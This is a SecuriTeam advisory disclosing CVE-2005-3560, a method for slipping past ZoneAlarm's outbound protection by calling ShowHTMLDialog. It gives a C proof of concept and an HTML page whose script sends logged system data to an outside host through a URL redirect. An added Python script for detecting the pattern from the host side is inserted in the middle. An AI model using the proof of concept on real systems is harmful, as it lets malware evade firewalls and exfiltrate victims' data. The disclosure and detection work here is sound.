[NT] Zone Labs ShowHTMLDialog Bypassing Vulnerability



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com





SUMMARY

" <http://www.zonelabs.com/> Zone Alarm Pro and Internet Security Suite
are firewall programs for Microsoft Windows."

By exploiting Zone Labs' trust in certain web-based programs, malicious
programs can bypass Zone Alarm Pro and Internet Security Suite protection
and send information about the system to attackers.

DETAILS

Vulnerable Systems:
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suite version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x

Zone Alarm products with Advanced Program Control or OS Firewall Technology
enabled detect and block almost all of the APIs (such as Shell,
ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that are commonly used by
malicious programs to send data via HTTP by piggybacking on other
trusted programs. However, it is still possible for a malicious program
(a Trojan or worm, etc.) to make outbound connections to the evil site by
piggybacking on a trusted Internet browser, using an "HTML Modal Dialog" in
conjunction with simple JavaScript. Here it is assumed that the default
browser (IE, Firefox, etc.) is authorized to access the Internet. In a
default installation of ZoneAlarm Pro, IE is allowed to access the
Internet by default.

By using the ShowHTMLDialog() method, any malicious program can create a
modal dialog box that displays HTML. This in turn can be used to redirect
the page to the attacker's site. It was observed that, when this method is
used, ZA Pro and Internet Security Suite are unable to block Internet
access. Any malicious program can use this method to send data out via
HTTP to the attacker and, at the same time, receive command instructions
from the attacker.

On successful exploitation, the malicious program will be able to send the
victim's details and personal system information to the attacker, which
can further lead to complete system compromise.

Proof-of-Concept:
osfwbypass-demo.c:
/* Compile as C++: the original uses C++ COM call syntax (pURLMoniker->Release()). */
#include <windows.h>
#include <mshtmhst.h>   /* SHOWHTMLDIALOGFN */
#include <urlmon.h>     /* CreateURLMoniker */

BOOL LoadHtmlDialog(void)
{
    HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));

    if (hinstMSHTML)
    {
        SHOWHTMLDIALOGFN *pfnShowHTMLDialog;

        // Resolve the export that opens a modal dialog box of HTML content type
        // (GetProcAddress takes an ANSI name, so no TEXT() macro here)
        pfnShowHTMLDialog = (SHOWHTMLDIALOGFN *)GetProcAddress(hinstMSHTML,
                                                               "ShowHTMLDialog");

        if (pfnShowHTMLDialog)
        {
            IMoniker *pURLMoniker = NULL;

            // Moniker for the HTML file containing the data to be sent via HTTP
            BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
            CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

            if (pURLMoniker)
            {
                (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                pURLMoniker->Release();
            }

            SysFreeString(bstrURL);
        }

        FreeLibrary(hinstMSHTML);
    }

    return TRUE;
}
/* Eof */

modal-dialog.htm:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Redirection Dialog</title>

<script language="JavaScript">
// Here goes the information logged by the malicious program which
// will be sent to the evil site via HTTP request
var sTargetURL =
    "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here]";
window.location.href = sTargetURL;
window.close();
</script>

</head>
</html>
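From the defender's side, one host-based way to spot this piggybacking pattern is to correlate a non-browser process mapping MSHTML.DLL (the library that exports ShowHTMLDialog) with an outbound HTTP connection from the same process shortly afterwards. The following Python script is an added example, not part of the advisory or of Zone Labs' products; it runs that correlation over a constructed, simplified event log whose format, process names and addresses are assumptions for illustration.

```python
import re

# Constructed sample log (not real ZoneAlarm or Sysmon output): one event per line.
SAMPLE_LOG = """\
10:00:01 IMAGELOAD pid=1204 image=C:\\Program Files\\Internet Explorer\\iexplore.exe module=C:\\WINDOWS\\system32\\mshtml.dll
10:00:02 NETCONNECT pid=1204 image=C:\\Program Files\\Internet Explorer\\iexplore.exe dest=203.0.113.10:80
10:00:05 IMAGELOAD pid=2210 image=C:\\temp\\osfwbypass-demo.exe module=C:\\WINDOWS\\system32\\mshtml.dll
10:00:06 NETCONNECT pid=2210 image=C:\\temp\\osfwbypass-demo.exe dest=203.0.113.10:80
10:00:09 IMAGELOAD pid=3001 image=C:\\WINDOWS\\system32\\notepad.exe module=C:\\WINDOWS\\system32\\comctl32.dll
10:00:10 NETCONNECT pid=3001 image=C:\\WINDOWS\\system32\\notepad.exe dest=203.0.113.10:80
"""

BROWSERS = {"iexplore.exe", "firefox.exe"}   # processes expected to host MSHTML (assumed allow-list)
HTTP_PORTS = {80, 443, 8080}
WINDOW_SECONDS = 60                          # load-to-connect correlation window

LINE_RE = re.compile(
    r"^(\d\d):(\d\d):(\d\d) (IMAGELOAD|NETCONNECT) pid=(\d+) image=(.+?) (module|dest)=(.+)$")

def parse_line(line):
    """Return (seconds, kind, pid, exe_basename, detail) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, s, kind, pid, image, _, detail = m.groups()
    ts = int(h) * 3600 + int(mi) * 60 + int(s)
    return ts, kind, int(pid), image.rsplit("\\", 1)[-1].lower(), detail

def detect(log_text):
    """Alert when a non-browser process loads mshtml.dll and then connects out over HTTP."""
    mshtml_loads = {}   # pid -> time a non-browser process mapped mshtml.dll
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, kind, pid, exe, detail = rec
        if kind == "IMAGELOAD":
            if detail.lower().endswith("\\mshtml.dll") and exe not in BROWSERS:
                mshtml_loads[pid] = ts
        elif kind == "NETCONNECT" and pid in mshtml_loads:
            port = int(detail.rsplit(":", 1)[-1])
            if port in HTTP_PORTS and ts - mshtml_loads[pid] <= WINDOW_SECONDS:
                alerts.append((pid, exe, detail))
    return alerts

if __name__ == "__main__":
    for pid, exe, dest in detect(SAMPLE_LOG):
        print(f"ALERT pid={pid} {exe} loaded mshtml.dll then connected to {dest}")
```

The browser process itself (pid 1204) and the unrelated notepad connection (pid 3001) are not flagged; only the process that mapped mshtml.dll outside the allow-list and then talked HTTP is.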

CVE Information:
CVE-2005-3560 - <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3560>

Disclosure Timeline:
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version
info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure


ADDITIONAL INFORMATION

The information has been provided by <mailto:debasis@xxxxxxxxxxxxxxxxxx>
Debasis Mohanty.
The original article can be found at:
<http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html>


